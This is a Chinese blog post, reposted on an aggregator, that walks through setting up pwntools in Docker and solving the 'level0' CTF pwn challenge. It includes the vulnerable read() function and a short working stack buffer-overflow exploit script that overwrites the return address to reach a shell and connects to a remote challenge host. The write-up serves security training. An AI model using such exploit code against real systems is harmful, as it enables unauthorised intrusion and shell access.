IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> pwntools用docker实现,进行pwn题解答 -> 正文阅读

[系统运维]pwntools用docker实现,进行pwn题解答

pwntools环境

这里我直接用docker环境,Ubuntu环境的docker建议看我这个https://blog.csdn.net/CSNN2019/article/details/119057956?spm=1001.2014.3001.5501,搞好环境之后,测试的时候,会报如下错误
在这里插入图片描述

经过我如下操作,即可解决这个报错

步骤一

修改docker镜像源,如果没有 daemon.json就新建添加以下内容:

[ak666@ubuntu ~]# cd /etc/docker
[ak666@ubuntu docker]# ls
daemon.json  key.json
[ak666@ubuntu docker]# vim daemon.json 
 
 # 添加以下内容
{
 
  "registry-mirrors": ["http://hub-mirror.c.163.com"]
 
}
 
# 也可以添加多个国内源
{
 
"registry-mirrors": ["http://hub-mirror.c.163.com", "https://registry.docker-cn.com"]
 
}

步骤二

vi /etc/resolv.conf,添加nameserver 8.8.8.8
在这里插入图片描述
以交互式的方式去运行pwntools
在这里插入图片描述
紧接着我import pwn
在这里插入图片描述
报错,只需要在pwntools中安装pathlib2模块就好
在这里插入图片描述
然后import pwn
在这里插入图片描述
成功然后需要进行映射:
需要把level0这个文件映射到pwntools环境下,当然直接映射目录。
在这里插入图片描述
/home/ak666/Desktop/CTF目录

docker run -it -v  /home/ak666/Desktop/CTF/:/home/pwntools/  /bin/bash

level0

sudo docker run -it -v /home/ak666/Desktop/CTF/:/home/pwntools pwntools/pwntools /bin/bash

把物理机中/home/ak666/Desktop/CTF/目录下的文件映射到docker中/home/pwntools下,后者可以随便写,因为无所谓。

这里用docker环境的话,我的docker中pwntools环境每次进去都需要安装pathlib2一遍(因为每次都是重启。需要写脚本然后映射到docker中pwntools环境中去,紧接着就是执行一波KO

ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  return read(0, buf, 0x200uLL);
}

长度为0x200字符,直接放入 仅有128字符长度的数组中(也就是栈中)。另外找到一个函数,直接获得一个shell,缓冲区溢出,就修改返回地址跳转到这里
在这里插入图片描述

# coding:utf-8
from pwn import *
r = remote("111.200.241.244",49201)#远程连接
payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596)
r.recvuntil("Hello, World\n")
r.sendline(payload)
r.interactive()

这里的话需要加第一行,不加的话报错如下:

SyntaxError: Non-ASCII character '\xe8' in file level0 on line 2, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details

在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-08-25 12:36:42  更:2021-08-25 12:37:13 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 9:12:16-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计